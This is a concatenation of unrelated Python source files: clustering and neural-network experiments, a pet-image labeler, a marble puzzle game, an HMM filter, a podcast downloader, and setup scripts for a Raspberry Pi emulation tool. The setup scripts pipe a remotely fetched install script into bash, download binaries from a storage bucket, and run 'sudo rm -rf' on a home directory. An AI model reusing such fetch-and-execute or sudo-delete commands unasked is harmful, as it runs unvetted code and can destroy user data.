print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(9):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(f_classif, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(rx)
truth = checker.predict(rx)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
# all values in tha cluster "should" in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
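# Tiny worked example (hypothetical numbers): if clusters[3] == [0, 4, 9] and the
# corresponding truth values are [1, 1, 0], then mapper[3] == round(2/3) == 1, so every
# point assigned to cluster 3 gets scored as class 1.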
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
# dank magic, wrap an array cuz reasons
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 20, 50, 88] # eight for num speakers, eleven for num vowels
orig = add
for num_c in clusters:
add = orig + "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(rx)
truth = checker.predict(rx)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Tanh", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_vowel()
# em(train_x, train_y, test_x, test_y)
# km(train_x, train_y, test_x, test_y)
# pca(train_x, train_y, test_x, test_y)
# ica(train_x, train_y, test_x, test_y)
# randproj(train_x, train_y, test_x, test_y)
kbest(train_x, train_y, test_x, test_y)
# nn(train_x, train_y, test_x, test_y)
```
|
{
"source": "JessRudder/pretrained-image-classifier",
"score": 4
}
|
#### File: pretrained-image-classifier/intropyproject-classify-pet-images/get_pet_labels.py
```python
from os import listdir
# TODO 2: Define get_pet_labels function below. Please be certain to replace None
# in the return statement with results_dic dictionary that you create
# with this function
#
def get_pet_labels(image_dir):
"""
Creates a dictionary of pet labels (results_dic) based upon the filenames
of the image files. These pet image labels are used to check the accuracy
of the labels that are returned by the classifier function, since the
filenames of the images contain the true identity of the pet in the image.
Be sure to format the pet labels so that they are in all lower case letters
and with leading and trailing whitespace characters stripped from them.
(ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')
Parameters:
image_dir - The (full) path to the folder of images that are to be
classified by the classifier function (string)
Returns:
results_dic - Dictionary with 'key' as image filename and 'value' as a
List. The list contains the following item:
index 0 = pet image label (string)
"""
# Replace None with the results_dic dictionary that you created with this
# function
# Imports only listdir function from OS module
# Retrieve the filenames from folder pet_images/
results_dic = {}
filename_list = listdir(image_dir)
for name in filename_list:
results_dic[name] = results_dic.get(name, create_label_from_filename(name))
return results_dic
def create_label_from_filename(filename):
"""
Takes a filename and turns it into a list with a single lowercase string
containing the pet label that is in the filename
(ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')
Parameters:
filename - The filename (string)
Returns:
List with filename turned into lowercase string stripped of numbers and
extensions (e.g. 'Boston_terrier_02259.jpg' => ['boston terrier'])
"""
name_list = filename.split("_")[:-1]
for idx in range(0, len(name_list)):
name_list[idx] = name_list[idx].lower()
return [" ".join(name_list)]
```
|
{
"source": "JessSantos/Marble-Ordering-Game",
"score": 4
}
|
#### File: JessSantos/Marble-Ordering-Game/CelticaJM.py
```python
from graphics import *
import random
## to jump to display/gui-related functions and settings, search "GUI settings"
## to jump to game-related and background functions, search "mechanics"
## to jump to main() function, search "main()"
### ~~ GUI settings ~~ ###
# I made it playable for every size board, though it might look prettier at some settings, like 500 or 600
# this value can be changed to adjust board size; maybe in the finished game it could ask for input for board size
width = height = w = 600 # "w" for width; height and width should always be equal for this game
# Purpose: dictionary of ratio-points where the balls should arrange themselves around heboard
# Syntax: Circle(Point(pointdict()[iterationitem][1]), Point(pointdict()[iterationitem][2])))
# Parameters: none
# Return value: pointdict: a dictionary mapping locations to location on the board
def pointdict():
d = (1/10)*w # "d" for distance from sides of game board
# board setup; these are the loactions of all the balls
pointdict = {0:[(6/10)*w, d],
1:[(7/10)*w, d],
2:[(8/10)*w, d],
3:[w-d, d],
4:[w-d, (2/10)*w],
5:[w-d, (3/10)*w],
6:[w-d, (4/10)*w],
7:[w-d, (5/10)*w],
8:[w-d, (6/10)*w],
9:[w-d, (7/10)*w],
10:[w-d, (8/10)*w],
11:[w-d, w-d],
12:[(8/10)*w, w-d],
13:[(7/10)*w, w-d],
14:[(6/10)*w, w-d],
15:[(5/10)*w, w-d],
16:[(4/10)*w, w-d],
17:[(3/10)*w, w-d],
18:[(2/10)*w, w-d],
19:[d, w-d],
20:[d, (8/10)*w],
21:[d, (7/10)*w],
22:[d, (6/10)*w],
23:[d, (5/10)*w],
24:[d, (4/10)*w],
25:[d, (3/10)*w],
26:[d, (2/10)*w],
27:[d , d],
28:[(2/10)*w, d],
29:[(3/10)*w, d],
30:[(4/10)*w, d],
31:[(5/10)*w, d],
32:[w/2, w/2]}
return pointdict
# Purpose: helper function to draw the background rectangles that are darker versions of the colors they house
# Syntax: draw_rectangle(width/4, width/4, "purple", window)
# Parameters: x: the x-coordinate of the anchor point
# y: the y-coordinate of the anchor point
# color: the color of the box
# win: the window to draw it in
# Return value: none
def draw_rectangle(x, y, color, win): # draws the rectangles that make up the background cross
rect = Rectangle(Point(x-(width/4-25), y-(height/4-25)), Point(x+(width/4-25), y+(height/4-25)))
rect.setFill(color)
rect.draw(win)
# Purpose: helper function to draw the circles that make up the marbles of Celtica
# Syntax: draw_circle(Point(width/5, width/5), "blue", window)
# Parameters: point: the anchor point of the circle to be drawn
# color: the color of the inside of the circle
# win: the window in wich to draw the circle
# Return value: none
def draw_circle(point, color, win):
circ = Circle(Point(pointdict()[point][0], pointdict()[point][1]), 20)
circ.setOutline("white")
circ.setWidth(1)
circ.setFill(color)
circ.draw(win)
# Purpose: helper function to draw the marbles of the board consistently
# Syntax: draw_board(list_representing_the_board, window)
# Parameters: board: a list in the format ["G", "G", "B", ...], the same length and contents as setup_game(), though not necessarily the same order
# win: the window in which to draw the board
# Return value: none
def draw_board(board, win):
for numitem in range(33): # give each letter the appropriate colour
if board[numitem] == "G":
color = color_rgb(0, 250, 0)
if board[numitem] == "Y":
color = color_rgb(254, 250, 6)
if board[numitem] == "R":
color = color_rgb(255, 39, 0)
if board[numitem] == "B":
color = color_rgb(0, 251, 255)
if board[numitem] == "X":
color = "black"
draw_circle(numitem, color, win)
# Purpose: helper function to draw the background in one, consistent, swoop
# Syntax: make_background(window)
# Parameters: window: the window in which you want the background drawn
# Return value: none
def make_background(win): # makes the background that looks like a celtic cross
win.setBackground(color_rgb(1, 25, 148)) # make the background blue
yellow = color_rgb(146, 144, 0) # define dark colours of squares
aqua = color_rgb(0, 145, 147)
red = color_rgb(148, 17, 0)
green = color_rgb(0, 142, 0)
draw_rectangle(w/4, w/4, aqua, win) # draw squares
draw_rectangle((3/4)*w, w/4, green, win)
draw_rectangle(w/4, (3/4)*w, yellow, win)
draw_rectangle((3/4)*w, (3/4)*w, red, win)
# Purpose: to draw the text that is always present on the Celtica board
# Syntax: draw_board_text(window)
# Parameters: win: the window in which to draw the writing
# Return value: none
def draw_board_text(win):
celtica = Text(Point(w/2, w/4), "Celtica") # begin drawing text for "Celtica"
celtica.setSize(25)
celtica.setTextColor("white")
celtica.draw(win)
brb = Text(Point(w/2, (w/4)+25), "by BRB") # begin drawing text for "by BRB"
brb.setStyle("bold")
brb.setTextColor("white")
brb.draw(win)
### ~~ mechanics ~~ ###
# Purpose: helper function to setup_game() that appends something to a list 8 times
# Syntax: append_8(item, alist)
# Parameters: item - an item that you want to append to a list; list - the list you wish to append to
# Return value: none
def append_8(item, alist):
counter = 0
while counter < 8:
alist.append(item)
counter = counter + 1
# Purpose: to generate a list of balls, in order, for a game of celtica
# Syntax: board = setup_game()
# Parameters: none
# Return value: board - a list of characters representing the celtica game board; ['G', 'G', 'G', 'G', 'G', ... ]
def setup_game():
board = []
append_8("G", board)
append_8("R", board)
append_8("Y", board)
append_8("B", board)
board.append("X")
return board # this board should be in the winning configuration
# Purpose: to swap two values in the game board
# Syntax: exchange(board, 1, 7)
# Parameters: board - a list of characters representing the celtica game board, ['G', 'G', 'G', 'G', 'G', ... ], two numbers that are indices in the list board
# Return value: none
def exchange(board, first, second):
board[first], board[second] = board[second], board[first]
# Purpose: to see if the game is over
# Syntax: is_over = is_game_over(board)
# Parameters: board - a list of characters representing the celtica game board, ['G', 'G', 'G', 'G', 'G', ... ]
# Return value: True, if winning configuration; False otherwise
def is_game_over(board):
if board == setup_game():
return True
else:
return False
# Purpose: helper function to create a shuffled board, because I apparently hadn't done this before
# Syntax: board_to_start_playing_with = make_random_board()
# Parameters: none
# Return value: shuffled version of winboard from setup_game(), list
def make_random_board():
newboard = setup_game()[:]
for i in range(25000):
possibletrade = random.randint(0, len(newboard)-1) # choose a random index in newboard
if is_neighbour(whereisX(newboard), possibletrade) == True:
exchange(newboard, whereisX(newboard), possibletrade) # if the random index is a legal move, then switch it
else:
continue
return newboard
# Purpose: handy helper function to quickly find X in a board
# Syntax: exchange(board, whereisX(board), 32)
# Parameters: board: the board you want to find X's location in
# Return value: the index of where X is in board
def whereisX(board):
return board.index("X")
# Purpose: helper function, returns true if the marble in question can be legally traded with another marble
# Syntax: if is_neighbour(whereisX(board), 20) == True: ...
# Parameters: whereXis: can actually be any location on the board, but it's most useful to do it for X
# newspot: another location on the board to test for validity
# Return value: bool: True or False
def is_neighbour(whereXis, newspot):
    # neighbourdict is a dictionary of all the possible places a marble can move
neighbourdict = {0:(31, 1), 1:(0, 2), 2:(1, 3), 3:(2, 4), 4:(3, 5), 5:(4, 6),
6:(5, 7), 7:(6, 32, 8), 8:(7, 9), 9:(8, 10), 10:(9, 11),
11:(10, 12), 12:(11, 13), 13:(12, 14), 14:(13, 15), 15:(14, 32, 16),
                     16:(15, 17), 17:(16, 18), 18:(17, 19), 19:(18, 20), 20:(19, 21),
21:(20, 22), 22:(21, 23), 23:(22, 32, 24), 24:(23, 25), 25:(24, 26),
26:(25, 27), 27:(26, 28), 28:(27, 29), 29:(28, 30), 30:(29, 31),
31:(30, 32, 0), 32:(31, 7, 23, 15)}
if newspot in neighbourdict[whereXis]: # returns True if neighbour, False if not
return True
else:
return False
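# A couple of quick sanity checks on the adjacency table above (a small sketch;
# the indices follow the 0-31 ring plus the centre marble at index 32):
assert is_neighbour(32, 7) is True   # the centre can swap with marble 7
assert is_neighbour(0, 2) is False   # 0 and 2 are two apart on the ring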
# Purpose: determines if a move is legal
# Syntax: if is_legal_move(board, 20): ...
# Parameters: board: the board with which you're working
# index: the index you might want to switch to
# Return value: bool: True or False
def is_legal_move(board, index):
whereXis = board.index("X")
return is_neighbour(whereXis, index)
# Purpose: Check if a point is within the bounding box of button
# Syntax: bool = is_clicked(point, button)
# Parameters: point - Point object
# button - Rectangle object
# Return value: True if point is within the bounding box of button;
# False, otherwise
def is_clicked(point, button):
top_left = button.getP1()
bottom_right = button.getP2() # useable as is because graphics.py has a square object for every circle object
return (point.x >= top_left.x and point.x <= bottom_right.x and
point.y >= top_left.y and point.y <= bottom_right.y)
### ~~ main ~~ ###
# Purpose: runs the completed game
# Syntax: main()
# Parameters: none
# Return value: none
def main():
win = GraphWin("Celtica", width, height) # make a window
make_background(win) # set up background, text, and scrambled board
draw_board_text(win)
board = make_random_board()
draw_board(board, win) # draw the board
    while True:
        try: # .checkMouse() may fail if the window was closed; prevent
            point = win.checkMouse() # Python from crashing by placing it within a try/except block;
        except GraphicsError: # given the error, the function can return (instead of crashing)
            return
        if point == None: # if no mouse click, starts while loop all over (this try/except was copied from lab 6)
            continue
        for keyvalue in pointdict().items(): # where marbles get exchanged
            index, centerpoint = keyvalue # unpack the tuple so both keys and values are useable
            if is_clicked(point, Circle(Point(centerpoint[0], centerpoint[1]), 20)):
                if is_legal_move(board, index):
                    exchange(board, whereisX(board), index) # if it's a legal move, exchange marbles
                    draw_board(board, win) # once exchanged, redraw
        if is_game_over(board) == True: # if board is now in the winning configuration...
            winner = Text(Point(w/2, (2/3)*w), "You win!") # begin drawing text for "You win!"
            winner.setSize(25)
            winner.setTextColor("white")
            winner.draw(win)
    win.close()
main()
```
|
{
"source": "jessstringham/notebooks",
"score": 3
}
|
#### File: notebooks/nb_code/hmm_alpha_recursion.py
```python
width = 6
height = 5
num_hidden_states = width * height
# prob of starting locations
p_hidden_start = np.ones(num_hidden_states) / num_hidden_states
# verify it's a valid probability distribution
assert np.all(np.isclose(np.sum(p_hidden_start), 1))
assert np.all(p_hidden_start >= 0)
def create_transition_joint(width, height):
num_hidden_states = width * height
# begin by building an unnormalized matrix with 1s for all legal moves.
unnormalized_transition_joint = np.zeros((num_hidden_states, num_hidden_states))
# This will help me map from height and width to the state
map_x_y_to_hidden_state_id = np.arange(num_hidden_states).reshape(height, width).T
for x in range(width):
for y in range(height):
h_t = map_x_y_to_hidden_state_id[x, y]
# hax to go through each possible direction
for d in range(4):
new_x = x
new_y = y
if d // 2 == 0:
# move left or right!
new_x = x + ((d % 2) * 2 - 1)
else:
# move up or down!
new_y = y + ((d % 2) * 2 - 1)
# make sure they don't walk through walls
if any((
new_x > width - 1,
new_x < 0,
new_y > height - 1,
new_y < 0
)):
continue
h_t_minus_1 = map_x_y_to_hidden_state_id[new_x, new_y]
unnormalized_transition_joint[h_t_minus_1][h_t] = 1
# normalize!
p_transition_joint = unnormalized_transition_joint / np.sum(unnormalized_transition_joint)
# make sure this is a joint probability
assert np.isclose(np.sum(p_transition_joint), 1)
# not super necessary, but eh
assert np.all(p_transition_joint >= 0)
return p_transition_joint
def create_transition(width, height):
p_transition_joint = create_transition_joint(width, height)
num_hidden_states = width * height
p_transition = np.zeros((num_hidden_states, num_hidden_states))
for old_state in range(num_hidden_states):
p_transition[:, old_state] = p_transition_joint[:, old_state] / np.sum(p_transition_joint[:, old_state])
# verify it's a conditional distribution
    assert np.all(np.isclose(np.sum(p_transition, axis=0), 1))
return p_transition
p_transition = create_transition(width, height)
def plot_state_in_room(state_id, width=width, height=height):
h = np.zeros(width * height)
h[state_id] = 1
return h.reshape(height, width)
def make_sound_map():
NUM_SOUNDS = 10
LOW_PROB = 0.1
HIGH_PROB = 0.9
# everything has at least LOW_PROB of triggering the sound
grid = LOW_PROB * np.ones(num_hidden_states)
    # select NUM_SOUNDS locations to make HIGH_PROB
locs = np.random.choice(
num_hidden_states,
size=NUM_SOUNDS,
replace=False
)
grid[locs] = HIGH_PROB
return grid
prob_bump_true_given_location = make_sound_map()
prob_creak_true_given_location = make_sound_map()
num_visible_states = 4
def get_emission_matrix(prob_bump_true_given_location, prob_creak_true_given_location):
# prob_bump_given_state[v][state] = p(v | state)
p_emission = np.vstack((
prob_bump_true_given_location * prob_creak_true_given_location,
prob_bump_true_given_location * (1 - prob_creak_true_given_location),
(1 - prob_bump_true_given_location) * prob_creak_true_given_location,
(1 - prob_bump_true_given_location) * (1 - prob_creak_true_given_location),
))
    assert np.all(np.isclose(np.sum(p_emission, axis=0), 1))
return p_emission
p_emission = get_emission_matrix(prob_bump_true_given_location, prob_creak_true_given_location)
# 1 means True. ex: [1, 0] means bump=True, creak=False
map_visible_state_to_bump_creak = np.vstack((
[1, 1],
[1, 0],
[0, 1],
[0, 0],
))
timesteps = 10
hiddens = np.zeros(timesteps, dtype=int)
visibles = np.zeros(timesteps, dtype=int)
hiddens[0] = np.random.choice(num_hidden_states, p=p_hidden_start)
visibles[0] = np.random.choice(
num_visible_states,
p=p_emission[:, hiddens[0]]
)
for t in range(1, timesteps):
hiddens[t] = np.random.choice(
num_hidden_states,
p=p_transition[:, hiddens[t - 1]]
)
visibles[t] = np.random.choice(
num_visible_states,
p=p_emission[:, hiddens[t]]
)
def alpha_recursion(visibles, p_hidden_start, p_transition, p_emission):
num_timestamps = visibles.shape[0]
num_hidden_states = p_transition.shape[0]
# There will be one alpha for each timestamp
alphas = np.zeros((num_timestamps, num_hidden_states))
# alpha(h_1) = p(h_1) * p(v_1 | h_1)
alphas[0] = p_hidden_start * p_emission[visibles[0]]
# normalize to avoid overflow
alphas[0] /= np.sum(alphas[0])
for t in range(1, num_timestamps):
# p(v_s | h_s)
# size: new_states
corrector = p_emission[visibles[t]]
# sum over all hidden states for the previous timestep and multiply the
# transition prob by the previous alpha
# transition_matrix size: new_state x old_state
# alphas[t_minus_1].T size: old_state x 1
# predictor size: new_state x 1,
predictor = p_transition @ alphas[t - 1, None].T
# alpha(h_s)
alphas[t, :] = corrector * predictor[:, 0]
# normalize
alphas[t] /= np.sum(alphas[t])
return alphas
alphas = alpha_recursion(
visibles,
p_hidden_start,
p_transition,
p_emission,
)
assert np.all(np.isclose(np.sum(alphas, axis=1), 1))
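# A small follow-up sketch (assuming numpy is imported as np, as the rest of this
# snippet does): the filtered guess for each timestep is just the argmax of the
# normalized alpha row, which can be compared against the sampled hidden path.
filtered_states = np.argmax(alphas, axis=1)
print('sampled hidden states:   ', hiddens)
print('filtered (argmax alphas):', filtered_states)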
```
|
{
"source": "jessstringham/podcasts",
"score": 3
}
|
#### File: podcasts/podcast/download.py
```python
import typing
import urllib.error
import urllib.request
from podcast.files import download_location
from podcast.info import build_info_content
from podcast.info import InfoContent
from podcast.models import Channel
from podcast.models import get_podcast_audio_link
from podcast.models import NewStatus
from podcast.models import Podcast
from podcast.models import Radio
from podcast.models import RadioDirectory
def _download_from_url(url: str, location: str) -> bool:
try:
urllib.request.urlretrieve(url, location)
return True
except (IOError, urllib.error.ContentTooShortError):
# If a connection can't be made, IOError is raised
# If the download gets interrupted (ContentTooShortError), we
# should try again later
# TODO: can we tell if it was a bad filename (and should stop
# requesting it), or internet connectivity (and should tell
# us), or just a fluke (and should retry)?
return False
def download_podcast(
directory: RadioDirectory,
channel: Channel,
podcast: Podcast) -> Podcast:
location = download_location(directory, channel, podcast)
url = get_podcast_audio_link(podcast)
# TODO: This takes some time, especially when there are a lot to
# download. I could have this spawn threads, or add priorities,
# and so on. For now, since it runs every few hours, and is more
# of a push than a pull situation for the user, I'm leaving it
# simple
success = _download_from_url(url, location)
if success:
return podcast._replace(status=NewStatus())
else:
return podcast
def download_channel(directory: RadioDirectory, channel: Channel) -> Channel:
updated_podcasts = []
for known_podcast in channel.known_podcasts:
if type(known_podcast.status).__name__ == 'RequestedStatus':
known_podcast = download_podcast(directory, channel, known_podcast)
updated_podcasts.append(known_podcast)
return channel._replace(known_podcasts=updated_podcasts)
def download_radio(radio: Radio) -> typing.Tuple[Radio, InfoContent]:
downloaded_channels = [
download_channel(radio.directory, channel)
for channel in radio.channels
]
radio = radio._replace(channels=downloaded_channels)
info_content = build_info_content()
return (radio, info_content)
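# Rough usage sketch (the directory below is hypothetical; channels would come
# from wherever the radio state is loaded):
#   radio = Radio(channels=[...], directory=RadioDirectory('~/radio'))
#   radio, info = download_radio(radio)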
```
#### File: podcasts/podcast/models.py
```python
import typing
from collections import namedtuple
from urllib.parse import urlparse
PodcastData = typing.NamedTuple('PodcastData', [
('title', str), # title
('subtitle', str), # subtitle
('published', float), # time published
# string of the audio url, or None if we couldn't find one
('audio_link', typing.Dict[str, str]),
])
# Podcast states
UnmergedStatus = typing.NamedTuple('UnmergedStatus', [])
RequestedStatus = typing.NamedTuple('RequestedStatus', [])
CancelledStatus = typing.NamedTuple('CancelledStatus', [])
NewStatus = typing.NamedTuple('NewStatus', [])
StartedStatus = typing.NamedTuple('StartedStatus', [])
FinishedStatus = typing.NamedTuple('FinishedStatus', [])
DeletedStatus = typing.NamedTuple('DeletedStatus', [])
Podcast = typing.NamedTuple('Podcast', [
('data', PodcastData),
('status', typing.Union[
UnmergedStatus,
RequestedStatus,
CancelledStatus,
NewStatus,
StartedStatus,
FinishedStatus,
DeletedStatus,
])])
def get_podcast_audio_link(podcast: Podcast) -> str:
return podcast.data.audio_link['href']
def get_podcast_url(podcast: Podcast) -> str:
return urlparse(get_podcast_audio_link(podcast)).path.split('/')[-1]
# NOTE: This seems like something I'll probably regret
def get_podcast_id(podcast: Podcast) -> str:
return '.'.join(get_podcast_url(podcast).split('.')[:-1])
ChannelInfo = namedtuple('ChannelInfo', 'name url directory')
Channel = typing.NamedTuple('Channel', [
('channel_info', ChannelInfo),
('known_podcasts', typing.List[Podcast])])
def get_channel_id(channel: Channel) -> str:
return channel.channel_info.directory
def map_channel_podcasts(
channel: Channel,
map_f: typing.Callable[[Channel, Podcast], Podcast],
) -> Channel:
return channel._replace(
known_podcasts=[
map_f(channel, podcast)
for podcast in channel.known_podcasts])
RadioDirectory = typing.NewType('RadioDirectory', str)
Radio = typing.NamedTuple('Radio', [
('channels', typing.List[Channel]),
('directory', RadioDirectory)])
def map_radio_channels(
radio: Radio,
map_f: typing.Callable[[Channel], Channel],
) -> Radio:
return radio._replace(
channels=[
map_f(channel)
for channel in radio.channels])
def read_channel_from_id(
radio: Radio,
channel_id: str
) -> typing.Optional[Channel]:
for channel in radio.channels:
if get_channel_id(channel) == channel_id:
return channel
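# Hypothetical usage sketch (the values below are made up for illustration):
#   data = PodcastData(title='Example episode', subtitle='', published=0.0,
#                      audio_link={'href': 'https://example.com/ep1.mp3'})
#   podcast = Podcast(data=data, status=UnmergedStatus())
#   get_podcast_url(podcast)  # -> 'ep1.mp3'
#   get_podcast_id(podcast)   # -> 'ep1'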
```
|
{
"source": "Jesssullivan/clipi",
"score": 2
}
|
#### File: Jesssullivan/clipi/alias.py
```python
from common import *
"""
alias.py:
copy / update files at ~/.clipi to be accessed via alias.
add clipi to shell's rc file.
"""
class alias(object):
@classmethod
def add_to_bash(cls):
print('adding alias....')
clipi_line = "\\'~/.clipi/clipi.py\\'"
if platform == "linux" or platform == "linux2":
print("environment: detected Linux, continuing...")
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bashrc "
subprocess.Popen(cmd, shell=True).wait()
if platform == 'darwin':
print("environment: detected Mac OSX, continuing...")
            if os.path.exists(os.path.expanduser('~/.zshrc')):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.zshrc "
subprocess.Popen(cmd, shell=True).wait()
            if os.path.exists(os.path.expanduser('~/.bashrc')):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bashrc "
subprocess.Popen(cmd, shell=True).wait()
            if os.path.exists(os.path.expanduser('~/.bash_profile')):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bash_profile "
subprocess.Popen(cmd, shell=True).wait()
@classmethod
def bash_alias_update(cls):
# adds .directory for bash version, separate from git:
try:
subprocess.Popen("sudo rm -rf ~/.clipi", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo mkdir ~/.clipi", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo cp -rf ../clipi/* ~/.clipi/", shell=True).wait()
except:
pass
try:
subprocess.Popen("rm -rf ~/.clipi/.git", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo chmod 775 ~/.clipi/*", shell=True).wait()
except:
pass
@classmethod
def do_alias(cls):
cls.add_to_bash()
cls.bash_alias_update()
```
#### File: Jesssullivan/clipi/common.py
```python
import os
import subprocess
import sys
import random
from sys import platform
from time import sleep
from zipfile import ZipFile
import requests
from shutil import which
import xmltodict
class common(object):
bin_url = "http://clipi-bins.s3.amazonaws.com/"
@staticmethod
def is_installed(cmd):
print('checking if ' + cmd + ' is present...')
if not which(cmd):
print("didn't find " + cmd)
return False
else:
return True
@classmethod
def dep_install(cls, dep, brew_dep=None):
if platform == "linux" or platform == "linux2":
print("environment: detected Linux, continuing with apt-get....")
subprocess.Popen('sudo apt-get install ' + dep + ' -y', shell=True).wait()
# todo: maybe prompt for other package manager options
if brew_dep is None:
brew_dep = dep
elif platform == 'darwin':
print("environment: detected osx, not completely tested yet, YMMV")
if cls.is_installed('brew'):
print('attempting brew install of ' + brew_dep + '...... \n')
                subprocess.Popen('brew install ' + brew_dep, shell=True).wait()
else:
print("brew package manager not detected, attempting to install brew now...")
                brew_string = str(
                    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"')
subprocess.Popen(brew_string,
shell=True).wait()
@staticmethod
def ensure_dir(dirname='image'):
if not os.path.isdir(dirname):
os.mkdir(dirname)
@classmethod
def ensure_bins(cls):
if not os.path.isdir('bin'):
print('adding /bin....')
os.mkdir('bin')
sleep(.2)
print('fetching binary list from S3....')
index = requests.get(cls.bin_url).content
with open('bin/index.xml', 'wb') as f:
f.write(index)
sleep(.2)
print('parsing response....')
with open('bin/index.xml') as fd:
doc = xmltodict.parse(fd.read())
sleep(.2)
print('downloading....')
Keys = doc['ListBucketResult']['Contents']
for f in Keys:
item = f['Key']
cmd = str("wget -O bin/" + item + " " + cls.bin_url + item)
subprocess.Popen(cmd, shell=True).wait()
sleep(.2)
print('done.')
@classmethod
def main_install(cls):
if not cls.is_installed(cmd='wget'):
cls.dep_install(dep='wget')
if not cls.is_installed(cmd='qemu-system-arm'):
cls.dep_install(dep='qemu-system-arm')
if not cls.is_installed(cmd='qemu-system-aarch64'):
cls.dep_install(dep='qemu-system-aarch64')
if not cls.is_installed(cmd='dd'):
cls.dep_install(dep='dd')
if not cls.is_installed(cmd='nmap'):
cls.dep_install(dep='nmap')
if not cls.is_installed(cmd='p7zip'):
cls.dep_install(dep='p7zip')
# if not cls.is_installed(cmd='texinfo'):
# cls.dep_install(dep='texinfo')
# if not cls.is_installed(cmd='qemu-system-aarch64'):
# cls.dep_install(dep='qemu-system-aarch64')
@classmethod
def unzip(cls, input, output):
if input.split('.')[-1] == 'zip':
with ZipFile(input, 'r') as zip_ref:
zip_ref.extractall(output)
sleep(.1)
return 0
elif input.split('.')[-1] == '7z':
if not cls.is_installed(cmd='p7zip'):
print('installing p7zip to extract this image...')
cls.dep_install(dep='p7zip')
cls.dep_install(dep='p7zip-full')
sleep(.1)
print('attempting to extract image from 7z...')
cmd = str('7z e ' + input + ' -o' + output + ' -aoa')
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
elif 'gz' in input:
print('attempting to extract image from .gz...')
cmd = str('gunzip ' + input)
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
elif 'xz' in input:
print('attempting to extract image from .xz...')
cmd = str('unxz ' + input)
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
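    # Usage sketch (the archive names are hypothetical): extracting a downloaded
    # image archive into the local image/ directory, e.g.
    #   common.unzip('image/raspbian.zip', 'image')
    #   common.unzip('image/octopi.7z', 'image')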
@staticmethod
def restart(execute=None):
clipi_path = os.path.abspath(__file__).split('<')[0]
print('...\n')
sleep(.1)
print('...\n')
sys.stdout.flush()
